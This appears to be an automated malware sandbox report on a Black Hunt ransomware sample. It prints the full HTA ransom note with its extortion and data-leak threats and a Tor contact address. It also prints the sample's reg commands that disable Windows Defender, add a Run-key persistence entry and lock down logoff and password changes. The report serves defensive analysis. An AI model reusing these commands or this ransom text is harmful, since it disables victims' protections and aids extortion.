Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    28/01/2024, 16:55

General

  • Target

    eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe

  • Size

    707KB

  • MD5

    f61f804d4e954683fde465786ce6fa2c

  • SHA1

    6ea10e4f100586e99552889101e64e6bc92b61ef

  • SHA256

    a183b5e1befb6280842a93e6e183834682e28641a849c3980df27b5e462a2bb7

  • SHA512

    295875e90b0e852911df16bad9bbe1c1319d525b5ee3ac6feb336786e9904e4f8fde238ead1acd6772a58578b7db29bef7cbfef54aa08817653554862d3a087a

  • SSDEEP

    6144:/cmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1T84vnh:TuaTmkZJ+naie5OTamgEoKxLWSGh

Malware Config

Extracted

Path

C:\ProgramData\#BlackHunt_ReadMe.hta

Ransom Note
<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="x-ua-compatible" content="ie=9"><meta charset="UTF-8"><HTA:APPLICATION icon="#" WINDOWSTATE="maximize" scroll="no" SELECTION="yes" contextmenu="no" caption="yes" SYSMENU="no" innerBorder="yes" SHOWINTASKBAR="yes" singleInstance="yes" /><meta name="viewport" content="width = device-width,initial-scale=1.0"><style>a,abbr,acronym,address,applet,article,aside,audio,b,big,blockquote,body,canvas,caption,center,cite,code,dd,del,details,dfn,div,dl,dt,em,embed,fieldset,figcaption,figure,footer,form,h1,h2,h3,h4,h5,h6,header,hgroup,html,i,iframe,img,ins,kbd,label,legend,li,mark,menu,nav,object,ol,output,p,pre,q,ruby,s,samp,section,small,span,strike,strong,sub,summary,sup,table,tbody,td,tfoot,th,thead,time,tr,tt,u,ul,var,video{margin:0;padding:0;border:0;font-size:100%;font:inherit;vertical-align:baseline}article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{display:block}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:'';content:none}table{border-collapse:collapse;border-spacing:0}</style><style>body,html{background-color:#dadada;font-family:'Segoe UI',Tahoma,Geneva,Verdana,sans-serif;font-weight:600;font-size:16px}a{text-decoration:none;color:#0483ab}div.header{margin-top:15px;margin-bottom:5px;width:100%}div.header h1{width:97%;text-align:left;font-size:30px;font-weight:900;margin:auto}div.header h1 span#black{display:inline-block;color:#000;margin-right:0;padding:2px 2px}div.header h1 span#hunter{display:inline-block;color:#e90303;background-color:#000;padding:2px 8px;margin-left:0}div.header h1 span#hunter span#version{font-size:12px}div.message div.head-encrypted-msg{width:100%}div.message div.head-encrypted-msg h1{font-size:330%;width:97%;margin:auto;text-align:center;font-weight:700}div.message div.head-encrypted-msg h1 span{display:inline-block;color:#000;background-color:#e90303;padding:0 8px 0 8px;margin-right:3px}div.message div.head-attention-msg{width:97%;margin:auto;text-align:center;margin-top:1%;border:1px solid #e90303;background-color:#f1caca;border-radius:5px;font-size:250%;padding-top:10px;padding-bottom:10px}div.message div.head-attention-msg p{margin-bottom:.5%}div.message div.head-attention-msg p span{color:#e90303}div.content{margin:auto;margin-top:2%}div.content div.content-head-msg{font-size:32px;text-align:left;font-weight:600}div.content div.content-boxes{margin:auto;margin-top:2%}div.content div.box{width:96%;margin:auto;border-radius:5px;margin-bottom:30px}div.content div.content-left-box{background-color:#c5cfd8;padding:40px 0 40px 20px;font-size:24px;position:relative;border-left:15px solid #1878cf}div.content div.content-left-box h3.left-box-title{background-color:#1878cf;display:inline-block;padding:10px 10px;border-radius:5px;color:#fff;position:absolute;top:-22px;margin-left:auto;margin-right:auto;left:0;right:0;width:20%;text-align:center}div.content div.content-left-box div.content-contact-directly *{font-weight:600!important;line-height:1.4em}div.content div.content-left-box div.content-contact-directly h4{font-size:24px;font-weight:500;margin-top:8px}div.content div.content-left-box div.content-contact-directly h4#tox{font-weight:600;display:inline-block;margin-left:3px}div.content div.content-left-box div.content-contact-directly div.tox-id{margin-left:6%}div.content div.content-left-box div.content-contact-directly h4#tox-id{font-size:24px}div.content div.content-left-box div.content-contact-directly p#tox-id-p{font-size:16px}div.content div.content-left-box div.content-contact-directly h4#download-tox{display:inline-block;margin-left:6%}div.content div.content-left-box div.content-contact-directly p#download-tox-p{display:inline-block}div.content div.content-left-box div.content-contact-directly h4#email{display:inline-block;font-weight:600;margin-left:3px}div.content div.content-left-box div.content-contact-directly p#email-p{display:inline-block;font-size:24px;margin-left:8px}div.content div.content-left-box div.content-contact-directly h4#user-id{font-weight:500;margin-left:3px}div.content div.content-left-box div.content-contact-directly h4#user-id span{color:#e90303}div.content div.content-left-box div.content-contact-tor{margin-top:50px;font-weight:600!important}div.content div.content-left-box div.content-contact-tor h3{font-size:24px}div.content div.content-left-box div.content-contact-tor h3 span{color:#e90303}div.content div.content-left-box div.content-contact-tor div.content-tor-inside{margin-left:6;margin-top:10px}div.content div.content-left-box div.content-contact-tor div.content-tor-inside p{margin-top:8px}div.content div.content-left-box div.content-contact-tor div.content-tor-inside p img{position:relative;bottom:-3px}div.content div.content-right-box{background-color:#efb0b0;padding:40px 0 40px 20px;font-size:24px;position:relative;border-left:15px solid #e90303}div.content div.content-right-box h3.right-box-title{background-color:#e90303;display:inline-block;padding:10px 10px;border-radius:5px;color:#fff;position:absolute;top:-22px;margin-left:auto;margin-right:auto;left:0;right:0;width:20%;text-align:center}div.content div.content-right-box p{color:#000;font-size:22px;font-weight:600;margin-top:9px;line-height:1.4em}div.content div.content-left-box p{color:#000;font-size:22px;font-weight:600;margin-top:9px;line-height:1.4em}div.content div.content-left-box p span{color:#e90303;font-weight:700;font-size:24px}</style><title>Black Hunt</title></head><body><div class="header"><h1><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIMAAAAWCAYAAADjNi+WAAAACXBIWXMAAC4jAAAuIwF4pT92AAALpWlUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNi4wLWMwMDIgNzkuMTY0NDYwLCAyMDIwLzA1LzEyLTE2OjA0OjE3ICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIgeG1sbnM6eG1wTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0RXZ0PSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VFdmVudCMiIHhtbG5zOnN0UmVmPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VSZWYjIiB4bWxuczpwaG90b3Nob3A9Imh0dHA6Ly9ucy5hZG9iZS5jb20vcGhvdG9zaG9wLzEuMC8iIHhtbG5zOnRpZmY9Imh0dHA6Ly9ucy5hZG9iZS5jb20vdGlmZi8xLjAvIiB4bWxuczpleGlmPSJodHRwOi8vbnMuYWRvYmUuY29tL2V4aWYvMS4wLyIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgMjEuMiAoV2luZG93cykiIHhtcDpDcmVhdGVEYXRlPSIyMDIyLTEwLTEzVDEyOjMyOjAyKzAzOjMwIiB4bXA6TWV0YWRhdGFEYXRlPSIyMDIzLTA0LTA3VDA0OjIxOjI1KzA0OjMwIiB4bXA6TW9kaWZ5RGF0ZT0iMjAyMy0wNC0wN1QwNDoyMToyNSswNDozMCIgZGM6Zm9ybWF0PSJpbWFnZS9wbmciIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6NGRiOTQ5OGItYTg5Mi0yMTRjLTliYzgtZTZlMDM3ZTYzYmJkIiB4bXBNTTpEb2N1bWVudElEPSJhZG9iZTpkb2NpZDpwaG90b3Nob3A6ZGVlODIyNjgtMDA3Ni0wNDQ2LWFjMGEtMzk2OTY3MzA0YTdjIiB4bXBNTTpPcmlnaW5hbERvY3VtZW50SUQ9InhtcC5kaWQ6MjcyMzA2NjctZDM0ZC1lMjRmLWJlNTUtMDQyMWY2MmY3ZWI1IiBwaG90b3Nob3A6Q29sb3JNb2RlPSIzIiBwaG90b3Nob3A6SUNDUHJvZmlsZT0ic1JHQiBJRUM2MTk2Ni0yLjEiIHRpZmY6T3JpZW50YXRpb249IjEiIHRpZmY6WFJlc29sdXRpb249IjMwMDAwMDAvMTAwMDAiIHRpZmY6WVJlc29sdXRpb249IjMwMDAwMDAvMTAwMDAiIHRpZmY6UmVzb2x1dGlvblVuaXQ9IjIiIGV4aWY6Q29sb3JTcGFjZT0iMSIgZXhpZjpQaXhlbFhEaW1lbnNpb249IjQ0OSIgZXhpZjpQaXhlbFlEaW1lbnNpb249Ijg5Ij4gPHhtcE1NOkhpc3Rvcnk+IDxyZGY6U2VxPiA8cmRmOmxpIHN0RXZ0OmFjdGlvbj0iY3JlYXRlZCIgc3RFdnQ6aW5zdGFuY2VJRD0ieG1wLmlpZDoyNzIzMDY2Ny1kMzRkLWUyNGYtYmU1NS0wNDIxZjYyZjdlYjUiIHN0RXZ0OndoZW49IjIwMjItMTAtMTNUMTI6MzI6MDIrMDM6MzAiIHN0RXZ0OnNvZnR3YXJlQWdlbnQ9IkFkb2JlIFBob3Rvc2hvcCAyMS4yIChXaW5kb3dzKSIvPiA8cmRmOmxpIHN0RXZ0OmFjdGlvbj0ic2F2ZWQiIHN0RXZ0Omluc3RhbmNlSUQ9InhtcC5paWQ6NzU5MzVkMTMtYjM0OS02ZTRiLWIwODctYzc5ZTJmZGNiNzgwIiBzdEV2dDp3aGVuPSIyMDIyLTEwLTEzVDEyOjMyOjE0KzAzOjMwIiBzdEV2dDpzb2Z0d2FyZUFnZW50PSJBZG9iZSBQaG90b3Nob3AgMjEuMiAoV2luZG93cykiIHN0RXZ0OmNoYW5nZWQ9Ii8iLz4gPHJkZjpsaSBzdEV2dDphY3Rpb249InNhdmVkIiBzdEV2dDppbnN0YW5jZUlEPSJ4bXAuaWlkOmJiMmZiMmMyLWRjNDUtMzE0Yy1iMmQxLWRjNzFlZGUwNWJlYSIgc3RFdnQ6d2hlbj0iMjAyMy0wNC0wN1QwNDoyMToyNSswNDozMCIgc3RFdnQ6c29mdHdhcmVBZ2VudD0iQWRvYmUgUGhvdG9zaG9wIDIxLjIgKFdpbmRvd3MpIiBzdEV2dDpjaGFuZ2VkPSIvIi8+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJjb252ZXJ0ZWQiIHN0RXZ0OnBhcmFtZXRlcnM9ImZyb20gYXBwbGljYXRpb24vdm5kLmFkb2JlLnBob3Rvc2hvcCB0byBpbWFnZS9wbmciLz4gPHJkZjpsaSBzdEV2dDphY3Rpb249ImRlcml2ZWQiIHN0RXZ0OnBhcmFtZXRlcnM9ImNvbnZlcnRlZCBmcm9tIGFwcGxpY2F0aW9uL3ZuZC5hZG9iZS5waG90b3Nob3AgdG8gaW1hZ2UvcG5nIi8+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJzYXZlZCIgc3RFdnQ6aW5zdGFuY2VJRD0ieG1wLmlpZDo0ZGI5NDk4Yi1hODkyLTIxNGMtOWJjOC1lNmUwMzdlNjNiYmQiIHN0RXZ0OndoZW49IjIwMjMtMDQtMDdUMDQ6MjE6MjUrMDQ6MzAiIHN0RXZ0OnNvZnR3YXJlQWdlbnQ9IkFkb2JlIFBob3Rvc2hvcCAyMS4yIChXaW5kb3dzKSIgc3RFdnQ6Y2hhbmdlZD0iLyIvPiA8L3JkZjpTZXE+IDwveG1wTU06SGlzdG9yeT4gPHhtcE1NOkRlcml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6YmIyZmIyYzItZGM0NS0zMTRjLWIyZDEtZGM3MWVkZTA1YmVhIiBzdFJlZjpkb2N1bWVudElEPSJhZG9iZTpkb2NpZDpwaG90b3Nob3A6YTU3NzljMGQtYzI3Zi05ZjQ2LWJmMjgtYjQ2MzIzZjQ5ZjQxIiBzdFJlZjpvcmlnaW5hbERvY3VtZW50SUQ9InhtcC5kaWQ6MjcyMzA2NjctZDM0ZC1lMjRmLWJlNTUtMDQy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 " alt=""></h1></div><div class="message"><div class="head-encrypted-msg"><h1>YOUR<span>WHOLE NETWORK</span>HAS BEEN PENETRATED BY<span>Black Hunt</span>!</h1></div><div class="head-attention-msg"><p>We also have uploaded your sensitive data, which we Will leak or sell in case of no cooperation!</p><p><span>Restore your data possible only buying private key from us</span></p></div></div><div class="content"><div class="content-boxes"><div class="content-right-box box"><h3 class="right-box-title">ATTENTION</h3><p>remember, there are many middle man services out there pretending that they can recover or decrypt your files , whom neither will contact us or scam you, Remember we are first and last solution for your files otherwise you will only waste money and time</p><p>trying to decrypt your files without our decryptor and through third party softwares will make your files completely useless, there is no third party decryptor since we are the only key holders</p><p>we have uploaded many critical data and information from your machines , we won't leak or sell any of them in Case of successful Corporation, however if we don't hear from you in 14 days we will either sell or leak your data in many forums</p><p></p><p>Remain all of your files untouched, do not change their name, extension and...</p></div><div class="content-left-box box"><h3 class="left-box-title">CONTACT US</h3><p>Your system is offline. in order to contact us you can email this address<span> [email protected] </span>this ID (<span> O5wfAbiYYIYuuOIt </span>) for the title of your email.</p><p>If you weren't able to contact us whitin 24 hours please email:<span> [email protected] </span></p><p>Check your data situation in<a href="#"><span> http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion </span></a></p></div></div></div></body></html>
URLs

http-equiv="x-ua-compatible"

http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion

Signatures

  • Deletes NTFS Change Journal 2 TTPs 2 IoCs

    The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Clears Windows event logs 1 TTPs 5 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
  • Renames multiple (2879) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes backup catalog 3 TTPs 2 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Disables use of System Restore points 1 TTPs
  • Deletes itself 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 27 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 6 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 10 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe
    "C:\Users\Admin\AppData\Local\Temp\eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe"
    1⤵
    • UAC bypass
    • Checks whether UAC is enabled
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2500
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2700
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
        3⤵
        • Modifies registry class
        PID:2784
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2796
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
        3⤵
        • Modifies registry class
        PID:2356
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2812
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
        3⤵
        • Modifies registry class
        PID:2620
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2696
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
        3⤵
          PID:2160
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
        2⤵
          PID:2992
          • C:\Windows\system32\reg.exe
            reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
            3⤵
            • Adds Run key to start application
            PID:2680
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
          2⤵
            PID:2752
            • C:\Windows\system32\reg.exe
              reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
              3⤵
                PID:2840
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
              2⤵
                PID:2536
                • C:\Windows\system32\reg.exe
                  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                  3⤵
                  • Modifies Windows Defender Real-time Protection settings
                  PID:1704
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
                2⤵
                  PID:2520
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
                    3⤵
                      PID:1164
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
                    2⤵
                      PID:2632
                      • C:\Windows\system32\reg.exe
                        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
                        3⤵
                          PID:1836
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
                        2⤵
                          PID:2764
                          • C:\Windows\system32\reg.exe
                            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
                            3⤵
                              PID:2652
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
                            2⤵
                              PID:2592
                              • C:\Windows\system32\reg.exe
                                reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
                                3⤵
                                  PID:1652
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
                                2⤵
                                  PID:2640
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
                                    3⤵
                                      PID:1376
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
                                    2⤵
                                      PID:2712
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
                                        3⤵
                                          PID:1436
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
                                        2⤵
                                          PID:2484
                                          • C:\Windows\system32\reg.exe
                                            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
                                            3⤵
                                              PID:1208
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
                                            2⤵
                                              PID:1384
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
                                                3⤵
                                                  PID:772
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
                                                2⤵
                                                  PID:2888
                                                  • C:\Windows\system32\reg.exe
                                                    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
                                                    3⤵
                                                      PID:1284
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
                                                    2⤵
                                                      PID:2956
                                                      • C:\Windows\system32\reg.exe
                                                        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
                                                        3⤵
                                                          PID:2176
                                                      • C:\Windows\System32\cmd.exe
